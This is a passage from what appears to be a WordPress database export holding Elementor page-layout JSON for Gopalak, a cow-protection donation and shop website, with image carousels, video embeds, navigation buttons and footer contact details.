":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12260,2011,'_elementor_page_assets','a:0:{}'),(12261,2012,'_elementor_edit_mode','builder'),(12262,2012,'_elementor_template_type','wp-page'),(12263,2012,'_elementor_version','3.7.8'),(12264,2012,'_wp_page_template','elementor_canvas'),(12265,2012,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{